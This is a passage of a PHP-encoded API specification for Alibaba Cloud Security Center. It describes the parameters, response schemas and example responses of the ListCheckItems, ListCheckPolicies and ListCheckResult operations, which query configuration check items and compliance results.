recommended that the PageSize value is not left empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'Specifies the page number to display when performing a paginated query. The starting value is **1**, and the default value is **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response body of the API.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the current request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****'], 'CheckItems' => [ 'description' => 'Information about the check items.', 'type' => 'array', 'items' => [ 'description' => 'Information about the check items.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '100000000001', 'title' => ''], 'CheckShowName' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => 'testCheckItemName', 'title' => ''], 'Vendor' => ['description' => 'The cloud asset vendor.', 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'InstanceType' => ['description' => 'The asset type of the cloud product.', 'type' => 'string', 'example' => 'ECS', 'title' => ''], 'InstanceSubType' => ['description' => 'The sub-type of the cloud product\'s asset.', 'type' => 'string', 'example' => 'DISK', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level of the check item. Values:'."\n" ."\n" .'- **HIGH**: High risk'."\n" ."\n" .'- **MEDIUM**: Medium risk'."\n" ."\n" .'- **LOW**: Low risk', 'type' => 'string', 'example' => 'HIGH', 'title' => ''], 'Status' => ['description' => 'The status of the check item. Values:'."\n" ."\n" .'- **EDIT**: In editing'."\n" ."\n" .'- **RELEASE**: Released', 'type' => 'string', 'example' => 'EDIT', 'title' => ''], 'CheckPolicies' => [ 'description' => 'A list of standard, regulation, and section information associated with the check result.', 'type' => 'array', 'items' => [ 'description' => 'Information on the standards, regulations, and chapters associated with the inspection results.', 'type' => 'object', 'properties' => [ 'StandardId' => ['description' => 'Standard ID of the inspection item.', 'type' => 'integer', 'format' => 'int64', 'example' => '10000000001', 'title' => ''], 'StandardShowName' => ['description' => 'The display name of the standard for the check item.', 'type' => 'string', 'example' => 'testStandardShowName', 'title' => ''], 'RequirementId' => ['description' => 'The ID of the requirement for the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '10000000001', 'title' => ''], 'RequirementShowName' => ['description' => 'The display name of the requirement for the check item.', 'type' => 'string', 'example' => 'testRequirementShowName', 'title' => ''], 'SectionId' => ['description' => 'The ID of the section for the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '10000000001', 'title' => ''], 'SectionShowName' => ['description' => 'The display name of the section for the check item.', 'type' => 'string', 'example' => 'testSectionShowName', 'title' => ''], 'Type' => ['description' => 'The name of the associated policy category:'."\n" ."\n" .'- **AISPM**:AI Configuration Management (AI-SPM)'."\n" ."\n" .'- **KISPM**:Kubernetes Configuration Management (KSPM)'."\n" ."\n" .'- **IDENTITY\\_PERMISSION**:Identity and Permission Management (CIEM)'."\n" ."\n" .'- **RISK**:Security Risk'."\n" ."\n" .'- **COMPLIANCE**:Compliance Risk', 'type' => 'string', 'example' => 'AISPM', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Description' => [ 'description' => 'The description information of the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the check description attribute. Values:'."\n" ."\n" .'- **text**:Text', 'type' => 'string', 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'The specific content of the description.', 'type' => 'string', 'example' => 'custom description.', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Solution' => [ 'description' => 'The solution information for the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the check item solution information. Values:'."\n" ."\n" .'- **text**:Text', 'type' => 'string', 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'The content of the solution for the check item risk.', 'type' => 'string', 'example' => 'test solution.', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AssistInfo' => [ 'description' => 'The help information for the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the help information for the check item risk. Values:'."\n" ."\n" .'- **text**:Text', 'type' => 'string', 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'The content of the help information for the check item risk.', 'type' => 'string', 'example' => 'test assistInfo.', 'title' => ''], ], 'title' => '', 'example' => '', ], 'CheckRule' => ['description' => 'Define rules for custom inspection items.', 'type' => 'string', 'example' => '{"AssociatedData":{"ToDataList":[{"DataName":"ACS_ECS_Instance","PropertyPath":"InstanceId","FromPropertyPath":"InstanceId"}]},"MatchProperty":{"Operator":"AND","MatchProperties":[{"DataName":"ACS_ECS_Disk","PropertyPath":"InstanceId","MatchOperator":"EQ","MatchPropertyValue":"testId"},{"DataName":"ACS_ECS_Instance","PropertyPath":"InstanceId","MatchOperator":"EQ","MatchPropertyValue":"testInstanceId"}]}}', 'title' => ''], 'CheckType' => ['description' => 'The source type of the Security Posture check item:'."\n" ."\n" .'- **CUSTOM**: User-defined'."\n" ."\n" .'- **SYSTEM**: Predefined by the Security Posture platform', 'type' => 'string', 'example' => 'SYSTEM', 'title' => ''], 'Remark' => ['description' => 'Remark information.', 'type' => 'string', 'example' => 'remark.', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'Page information for paginated queries.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'Total number of data entries found.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'Number of data entries displayed on the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'CurrentPage' => ['description' => 'The page number of the current page when performing a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of records displayed per page when performing a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ParamIllegal.%s', 'errorMessage' => 'The parameter %s is invalid, please fill it in again.', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"CheckItems\\": [\\n {\\n \\"CheckId\\": 100000000001,\\n \\"CheckShowName\\": \\"testCheckItemName\\",\\n \\"Vendor\\": \\"ALIYUN\\",\\n \\"InstanceType\\": \\"ECS\\",\\n \\"InstanceSubType\\": \\"DISK\\",\\n \\"RiskLevel\\": \\"HIGH\\",\\n \\"Status\\": \\"EDIT\\",\\n \\"CheckPolicies\\": [\\n {\\n \\"StandardId\\": 10000000001,\\n \\"StandardShowName\\": \\"testStandardShowName\\",\\n \\"RequirementId\\": 10000000001,\\n \\"RequirementShowName\\": \\"testRequirementShowName\\",\\n \\"SectionId\\": 10000000001,\\n \\"SectionShowName\\": \\"testSectionShowName\\",\\n \\"Type\\": \\"AISPM\\"\\n }\\n ],\\n \\"Description\\": {\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"custom description.\\"\\n },\\n \\"Solution\\": {\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"test solution.\\"\\n },\\n \\"AssistInfo\\": {\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"test assistInfo.\\"\\n },\\n \\"CheckRule\\": \\"{\\\\\\"AssociatedData\\\\\\":{\\\\\\"ToDataList\\\\\\":[{\\\\\\"DataName\\\\\\":\\\\\\"ACS_ECS_Instance\\\\\\",\\\\\\"PropertyPath\\\\\\":\\\\\\"InstanceId\\\\\\",\\\\\\"FromPropertyPath\\\\\\":\\\\\\"InstanceId\\\\\\"}]},\\\\\\"MatchProperty\\\\\\":{\\\\\\"Operator\\\\\\":\\\\\\"AND\\\\\\",\\\\\\"MatchProperties\\\\\\":[{\\\\\\"DataName\\\\\\":\\\\\\"ACS_ECS_Disk\\\\\\",\\\\\\"PropertyPath\\\\\\":\\\\\\"InstanceId\\\\\\",\\\\\\"MatchOperator\\\\\\":\\\\\\"EQ\\\\\\",\\\\\\"MatchPropertyValue\\\\\\":\\\\\\"testId\\\\\\"},{\\\\\\"DataName\\\\\\":\\\\\\"ACS_ECS_Instance\\\\\\",\\\\\\"PropertyPath\\\\\\":\\\\\\"InstanceId\\\\\\",\\\\\\"MatchOperator\\\\\\":\\\\\\"EQ\\\\\\",\\\\\\"MatchPropertyValue\\\\\\":\\\\\\"testInstanceId\\\\\\"}]}}\\",\\n \\"CheckType\\": \\"SYSTEM\\",\\n \\"Remark\\": \\"remark.\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"TotalCount\\": 100,\\n \\"Count\\": 20,\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20\\n }\\n}","type":"json"}]', 'title' => 'Query Custom Check Items', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckItems'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckItems', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CustomCheckItem', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:customcheckitem/{#CheckId}'], ], ], ], ], ], 'ListCheckPolicies' => [ 'summary' => 'List User Policies', 'path' => '', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'PolicyType', 'in' => 'query', 'schema' => ['description' => 'Policy type of the custom check item rule:'."\n" .'- **STANDARD**: New standard'."\n" .'- **REQUIREMENT**: New requirement'."\n" .'- **SECTION**: New section', 'type' => 'string', 'required' => true, 'example' => 'STANDARD', 'title' => ''], ], [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'ID of the newly added classification setting.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1000000000001', 'title' => ''], ], [ 'name' => 'PolicyShowName', 'in' => 'query', 'schema' => ['description' => 'Name of the newly added classification setting.', 'type' => 'string', 'required' => false, 'example' => 'testPolicyName', 'title' => ''], ], [ 'name' => 'DependentPolicyId', 'in' => 'query', 'schema' => ['description' => 'ID of the associated parent policy.'."\n" ."\n" .'(The specific dependency relationship from low to high is: Section -> Requirement -> Standard)', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1000000000002', 'title' => ''], ], [ 'name' => 'CheckTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of policies to be queried (default queries both custom and system predefined policies).', 'type' => 'array', 'items' => ['description' => 'Type of the policy (indicates whether the policy is a system policy or a user policy):'."\n" .'- **CUSTOM**: User-defined'."\n" .'- **SYSTEM**: System-predefined', 'type' => 'string', 'required' => false, 'example' => 'CUSTOM', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'Name of the associated major policy category (required when PolicyType is STANDARD):'."\n" .'- **AISPM**: AI Configuration Management (AI-SPM)'."\n" .'- **IDENTITY_PERMISSION**: Identity and Permission Management (CIEM)'."\n" .'- **RISK**: Security Risk'."\n" .'- **COMPLIANCE**: Compliance Risk', 'type' => 'string', 'required' => false, 'example' => 'AISPM', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Number of check item information entries displayed per page during pagination. The default value is **50**, indicating 50 entries per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'Specifies the page number from which to start displaying the query results. The starting value is **1**. The default value is **1**, indicating that the display starts from the **1st** page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Language type for request and response messages, with a default value of **zh**. Possible values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Structure of the returned message.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'ID of the current call request, generated by Alibaba Cloud as a unique identifier for the request, which can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'ADE57832-9666-511C-9A80-B87DE2E8****'], 'Policies' => [ 'description' => 'List of policies.', 'type' => 'array', 'items' => [ 'description' => 'Details of the custom policy data.', 'type' => 'object', 'properties' => [ 'PolicyId' => ['description' => 'Policy ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '100000000001', 'title' => ''], 'PolicyType' => ['description' => 'Policy type of the custom check item rule:'."\n" .'- **STANDARD**: Standard policy type'."\n" .'- **REQUIREMENT**: Requirement policy type'."\n" .'- **SECTION**: Section policy type', 'type' => 'string', 'example' => 'STANDARD', 'title' => ''], 'PolicyShowName' => ['description' => 'Name of the custom policy.', 'type' => 'string', 'example' => 'testPolicyName', 'title' => ''], 'CheckType' => ['description' => 'Source type of the security check item:'."\n" .' - **CUSTOM**: User-defined'."\n" .' - **SYSTEM**: Predefined by the security platform', 'type' => 'string', 'example' => 'CUSTOM', 'title' => ''], 'Type' => ['description' => 'Name of the associated major policy category (required when PolicyType is STANDARD): '."\n" .'- **AISPM**: AI Configuration Management (AI-SPM) '."\n" .'- **KISPM**: Kubernetes Configuration Management (KSPM) '."\n" .'- **IDENTITY_PERMISSION**: Identity and Permission Management (CIEM)'."\n" .' - **RISK**: Security Risk'."\n" .' - **COMPLIANCE**: Compliance Risk', 'type' => 'string', 'example' => 'AISPM'."\n", 'title' => ''], 'DependentPolicyId' => ['description' => 'The ID of the associated higher-level policy.'."\n" ."\n" .'(The specific dependency relationship, from low to high, is Section -> Requirement -> Standard)', 'type' => 'integer', 'format' => 'int64', 'example' => '100000000002', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'Paging information for the query results.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number displayed in the result.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of data entries per page when performing a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of policies queried.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of data entries displayed on the current page when performing a paginated query.', 'type' => 'string', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ParamIllegal.%s', 'errorMessage' => 'The parameter %s is invalid, please fill it in again.', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ADE57832-9666-511C-9A80-B87DE2E8****\\",\\n \\"Policies\\": [\\n {\\n \\"PolicyId\\": 100000000001,\\n \\"PolicyType\\": \\"STANDARD\\",\\n \\"PolicyShowName\\": \\"testPolicyName\\",\\n \\"CheckType\\": \\"CUSTOM\\",\\n \\"Type\\": \\"AISPM\\\\n\\",\\n \\"DependentPolicyId\\": 100000000002\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69,\\n \\"Count\\": \\"20\\"\\n }\\n}","type":"json"}]', 'title' => 'Query Custom Check Item Policy Classification', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckPolicies'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckPolicies', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CustomCheckStandardPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:customcheckstandardpolicy/*'], ], ], ], ], ], 'ListCheckResult' => [ 'summary' => 'Retrieves the details of the risk items that are detected in the configuration checks on cloud services.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '119337', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'StandardIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The standard IDs.', 'type' => 'array', 'items' => ['description' => 'The standard ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'RequirementIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the requirements.', 'type' => 'array', 'items' => ['description' => 'The ID of the requirement.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'Statuses', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The statuses of check items. Separate multiple statuses with commas (,). Valid values:'."\n" ."\n" .'- **PASS**'."\n" ."\n" .'- **NOT\\_PASS**'."\n" ."\n" .'- **CHECKING**'."\n" ."\n" .'- **NOT\\_CHECK**'."\n" ."\n" .'- **WHITELIST**', 'type' => 'array', 'items' => [ 'description' => 'The statuses of check items. Separate multiple states with commas (,). Valid values:'."\n" ."\n" .'- **PASS**'."\n" ."\n" .'- **NOT\\_PASS**'."\n" ."\n" .'- **CHECKING**'."\n" ."\n" .'- **NOT\\_CHECK**'."\n" ."\n" .'- **WHITELIST**'."\n" ."\n" .'- **FAILED**', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'PASS', 'title' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'RiskLevels', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The risk levels of check items. Separate multiple risk levels with commas (,). Valid values:'."\n" ."\n" .'- **HIGH**'."\n" ."\n" .'- **MEDIUM**'."\n" ."\n" .'- **LOW**', 'type' => 'array', 'items' => [ 'description' => 'The risk levels of check items. Separate multiple risk levels with commas (,). Valid values:'."\n" ."\n" .'- **HIGH**'."\n" ."\n" .'- **MEDIUM**'."\n" ."\n" .'- **LOW**', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'HIGH', 'title' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'Vendors', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The cloud service providers. Valid values:'."\n" ."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" ."\n" .'- **TENCENT**: Tencent Cloud'."\n" ."\n" .'- **AWS**: Amazon Web Services (AWS)'."\n" ."\n" .'- **MICROSOFT**: Microsoft Azure', 'type' => 'array', 'items' => [ 'description' => 'The cloud service provider. Valid values:'."\n" ."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" ."\n" .'- **TENCENT**: Tencent Cloud'."\n" ."\n" .'- **AWS**: AWS'."\n" ."\n" .'- **MICROSOFT**: Microsoft Azure', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'InstanceTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The asset type of the cloud services. Valid values:'."\n" ."\n" .'- **ECS**: Elastic Compute Service (ECS)'."\n" ."\n" .'- **SLB**: Server Load Balancer (SLB)'."\n" ."\n" .'- **RDS**: ApsaraDB RDS'."\n" ."\n" .'- **MONGODB**: ApsaraDB for MongoDB (MongoDB)'."\n" ."\n" .'- **KVSTORE**: ApsaraDB for Redis (Redis)'."\n" ."\n" .'- **ACR**: Container Registry'."\n" ."\n" .'- **CSK**: Container Service for Kubernetes (ACK)'."\n" ."\n" .'- **VPC**: Virtual Private Cloud (VPC)'."\n" ."\n" .'- **ACTIONTRAIL**: ActionTrail'."\n" ."\n" .'- **CDN**: Alibaba Cloud CDN (CDN)'."\n" ."\n" .'- **CAS**: Certificate Management Service (formerly SSL Certificates Service)'."\n" ."\n" .'- **RDC**: Apsara Devops'."\n" ."\n" .'- **RAM**: Resource Access Management (RAM)'."\n" ."\n" .'- **DDOS**: Anti-DDoS'."\n" ."\n" .'- **WAF**: Web Application Firewall (WAF)'."\n" ."\n" .'- **OSS**: Object Storage Service (OSS)'."\n" ."\n" .'- **POLARDB**: PolarDB'."\n" ."\n" .'- **POSTGRESQL**: ApsaraDB RDS for PostgreSQL'."\n" ."\n" .'- **MSE**: Microservices Engine (MSE)'."\n" ."\n" .'- **NAS**: File Storage NAS (NAS)'."\n" ."\n" .'- **SDDP**: Sensitive Data Discovery and Protection (SDDP)'."\n" ."\n" .'- **EIP**: Elastic IP Address (EIP)', 'type' => 'array', 'items' => [ 'description' => 'The asset type of the cloud service. Valid values:'."\n" ."\n" .'- **ECS**: ECS'."\n" ."\n" .'- **SLB**: SLB'."\n" ."\n" .'- **RDS**: ApsaraDB RDS'."\n" ."\n" .'- **MONGODB**: MongoDB'."\n" ."\n" .'- **KVSTORE**: Redis'."\n" ."\n" .'- **ACR**: Container Registry'."\n" ."\n" .'- **CSK**: ACK'."\n" ."\n" .'- **VPC**: VPC'."\n" ."\n" .'- **ACTIONTRAIL**: ActionTrail'."\n" ."\n" .'- **CDN**: CDN'."\n" ."\n" .'- **CAS**: Certificate Management Service (formerly SSL Certificates Service)'."\n" ."\n" .'- **RDC**: Apsara Devops'."\n" ."\n" .'- **RAM**: RAM'."\n" ."\n" .'- **DDOS**: Anti-DDoS'."\n" ."\n" .'- **WAF**: WAF'."\n" ."\n" .'- **OSS**: OSS'."\n" ."\n" .'- **POLARDB**: PolarDB'."\n" ."\n" .'- **POSTGRESQL**: ApsaraDB RDS for PostgreSQL'."\n" ."\n" .'- **MSE**: MSE'."\n" ."\n" .'- **NAS**: NAS'."\n" ."\n" .'- **SDDP**: SDDP'."\n" ."\n" .'- **EIP**: EIP', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'ECS', 'title' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'CheckKey', 'in' => 'query', 'schema' => ['description' => 'The key that you want to use to search for check items in fuzzy match mode.', 'type' => 'string', 'required' => false, 'example' => 'OSS', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Maximum value: 100.', 'type' => 'integer', 'format' => 'int32', 'maximum' => '100', 'required' => false, 'example' => '50', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The instance IDs of the cloud services that you want to query. Separate multiple IDs with commas (,).', 'type' => 'array', 'items' => ['description' => 'The instance IDs of the cloud services that you want to query. Separate multiple IDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'i-bp1du66x6w07z4yya****', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'SortTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of the conditions based on which check items are sorted. Valid values:'."\n" ."\n" .'- **RISK\\_LEVEL**: risk level'."\n" ."\n" .'- **STATUS**: status', 'type' => 'array', 'items' => [ 'description' => 'The type of the condition based on which check items are sorted. Valid values:'."\n" ."\n" .'- **RISK\\_LEVEL**: risk level'."\n" ."\n" .'- **STATUS**: status', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'STATUS', 'title' => '', ], 'required' => false, 'maxItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'Types', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of check standards.', 'type' => 'array', 'items' => ['description' => 'The type of the check standard. Valid values:'."\n" ."\n" .'- **RISK**: Alibaba Cloud best security practices'."\n" ."\n" .'- **COMPLIANCE**: Center for Internet Security (CIS) compliance'."\n" ."\n" .'- **IDENTITY\\_PERMISSION**: identity and permission management', 'type' => 'string', 'required' => false, 'example' => 'RISK', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the instance. Valid values:'."\n" ."\n" .'- **cn-hangzhou**: International'."\n" ."\n" .'- **ap-southeast-1**: Singapore', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'CustomParam', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the check item supports custom parameters. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'CheckIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the check items.', 'type' => 'array', 'items' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '358', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'OperationTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Specifies whether fixing is supported. Valid values:'."\n" ."\n" .'- **SUPPORT\\_REPAIR**'."\n" ."\n" .'- **NOT\\_SUPPORT\\_REPAIR**', 'type' => 'array', 'items' => ['description' => 'Specifies whether fixing is supported. Valid values:'."\n" ."\n" .'- **SUPPORT\\_REPAIR**'."\n" ."\n" .'- **NOT\\_SUPPORT\\_REPAIR**', 'type' => 'string', 'required' => false, 'example' => 'SUPPORT_REPAIR', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'CheckTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Source type of the situation awareness check item.', 'type' => 'array', 'items' => ['description' => 'The source type of the Situation Awareness check item:'."\n" ."\n" .'- **CUSTOM**: User-defined'."\n" ."\n" .'- **SYSTEM**: Predefined by the Situation Awareness platform', 'type' => 'string', 'required' => false, 'example' => 'SYSTEM', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'TaskSources', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Delete the custom category in a custom inspection item.', 'type' => 'array', 'items' => ['description' => 'Task source. The value can be:'."\n" ."\n" .'- **YAO\\_CHI**: YaoChi.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListCheckResultResponse', 'type' => 'object', 'properties' => [ 'Checks' => [ 'description' => 'The check items.', 'type' => 'array', 'items' => [ 'description' => 'The check result.', 'type' => 'object', 'properties' => [ 'CheckPolicies' => [ 'description' => 'The check policies.', 'type' => 'array', 'items' => [ 'description' => 'The information about the standards, requirement items, and sections that are associated with the check result.', 'type' => 'object', 'properties' => [ 'StandardId' => ['description' => 'The standard ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'StandardShowName' => ['description' => 'The standard display name of the check item.', 'type' => 'string', 'example' => 'Best security practices', 'title' => ''], 'RequirementId' => ['description' => 'The ID of the requirement item for the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '2', 'title' => ''], 'RequirementShowName' => ['description' => 'The display name of the requirement item for the check item.', 'type' => 'string', 'example' => 'Alibaba cloud OSS best security practices', 'title' => ''], 'SectionId' => ['description' => 'The ID of the section for the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], 'SectionShowName' => ['description' => 'The display name of the section for the check item.', 'type' => 'string', 'example' => 'Log Audit', 'title' => 